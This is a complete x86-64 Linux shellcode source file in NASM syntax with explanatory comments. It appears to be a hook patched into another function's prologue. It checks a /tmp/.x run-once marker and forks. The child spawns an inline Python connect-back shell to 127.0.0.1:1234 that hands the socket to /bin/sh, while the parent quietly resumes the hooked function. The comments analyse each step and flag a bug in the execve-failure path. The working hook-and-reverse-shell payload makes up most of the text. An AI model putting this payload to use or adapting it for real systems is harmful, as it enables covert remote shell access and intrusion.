;; Position-independent x86-64 (Linux, SysV register usage) payload in NASM
;; syntax.  It appears to be entered through a `call` patched over another
;; function's prologue (see `exit:`), so on entry [rsp] holds a return address
;; into that function rather than a normal program entry state.
;; What it does, for analysts: checks a /tmp/.x run-once marker, forks, and in
;; the child execve()s /usr/bin/python with an inline script that connects to
;; 127.0.0.1:1234 and hands the socket to /bin/sh; the parent resumes the
;; hooked function.
BITS 64
[SECTION .text]
global _start
_start:
;; Register usage: rdi/rsi (the hooked function's first two args) are saved
;; and restored around the marker check; rax is consumed, and rcx/r11 are
;; clobbered by `syscall` and never restored -- presumably the hooked function
;; takes <= 3 arguments and ignores rax on entry; verify against the callee.
;; access("/tmp/.x", R_OK) -- /tmp/.x is a run-once marker: the python script
;; below creates it, so a second pass through this code takes the `exit` path.
push rdi
push rsi
mov rsi, 0x00782e2f706d742f ; "/tmp/.x\0" as little-endian bytes 2f 74 6d 70 2f 2e 78 00
push rsi                    ; string now lives on the stack
mov rdi, rsp                ; arg1 = pathname
mov rsi, 4                  ; arg2 = R_OK
mov rax, 0x15               ; __NR_access (21)
syscall
test rax, rax               ; pop does not touch flags, so ZF survives to `je`
pop rsi                     ; discard the 8-byte string
pop rsi                     ; restore caller's rsi
pop rdi                     ; restore caller's rdi
je exit                     ; access() == 0: marker exists, already ran -> resume callee
;; fork -- parent (rax = child pid > 0) and failure (rax < 0) both resume the
;; callee; only the child (rax == 0) continues below.
mov rax, 0x39               ; __NR_fork (57)
syscall
test rax, rax
jne exit
;; Child: build execve("/usr/bin/python", ["/usr/bin/python", "-c...", NULL], [NULL])
;; entirely on the stack.  rax == 0 here, which the later `mov al, ...` relies on.
push rax
mov rdx, rsp ; arg3 [ NULL ] -- envp points at the NULL just pushed (empty environment)
mov rbx, 0x6e6f687479702fff ; "/python" with 0xff in the low byte ...
shr rbx, 0x8                ; ... shifted out: rbx = "/python\0" (keeps a NUL out of the encoded immediate)
push rbx
mov rbx, 0x6e69622f7273752f ; "/usr/bin"
push rbx                    ; stack now holds the contiguous string "/usr/bin/python\0"
mov rdi, rsp ; arg1 "/usr/bin/python"
push rax ; NULL             ; argv terminator
call python                 ; returns with rcx = address of the "-c..." data after `python:`
push rcx ; "-c..."          ; argv[1]
push rdi ; "/usr/bin/python" ; argv[0]
mov rsi, rsp ; arg2 [ "/usr/bin/python", "-c...", NULL ]
;; exec
mov al, 0x3b                ; __NR_execve (59); only correct because rax == 0 from fork
syscall
;; exit -- reached only if execve fails.  NOTE(review): on failure rax holds
;; -errno, so its high bits are set and `mov al, 0x3c` does not produce 60;
;; that syscall is rejected and the child falls through into `exit:`, where
;; `pop rax` yields the argv[0] pointer pushed above and `jmp rax` jumps into
;; stack data -- the child crashes instead of exiting quietly.
mov al, 0x3c                ; intended __NR_exit (60)
syscall
exit:
;; execute missed instructions and return to callee
;; Shared tail for the parent, the fork-failure case and the "marker already
;; exists" case.  [rsp] is the return address pushed by the `call` that was
;; patched over the hooked function's prologue; the three instructions below
;; are presumably the prologue bytes that patch displaced (push rbp /
;; mov rbp,rsp / push r15), replayed here before jumping back to the
;; instruction following the patched call.  rax, rcx and r11 reach the callee
;; clobbered; rdi/rsi were restored in _start.
pop rax                     ; rax = return address into the hooked function
push rbp                    ; replayed original prologue ...
mov rbp, rsp
push r15                    ; ... ends here
jmp rax                     ; resume the hooked function past the patched call
python:
;; mov rcx, rip+8 -- position-independent "address of the data below":
;; `lea rcx, [rip+disp32]` encodes to 7 bytes and `ret` to 1, so $+8 is the
;; first byte of the db string.  Called from _start; returns with
;; rcx = &"-c..." and nothing else changed.
lea rcx, [rel $ +8]
ret
;; argv[1] for python: "-c" glued directly to the source text.  The script
;; (1) creates the /tmp/.x run-once marker that _start checks, (2) opens a
;; TCP socket (AF_INET=2, SOCK_STREAM=1) to "127.000.000.001" port 1234,
;; i.e. loopback 127.0.0.1, (3) dup2()s the socket over fds 0..2, and
;; (4) execvp()s /bin/sh -- a connect-back shell limited to the local host as
;; written.  execve reads this as a C string, so the `db 0` below must stay.
db '-cimport os,socket;open("/tmp/.x","w");s=socket.socket(2,1);s.connect(("127.000.000.001",1234));[os.dup2(s.fileno(),i) for i in range(3)];os.execvp("/bin/sh",["x"])'
db 0                        ; NUL terminator for the argv[1] string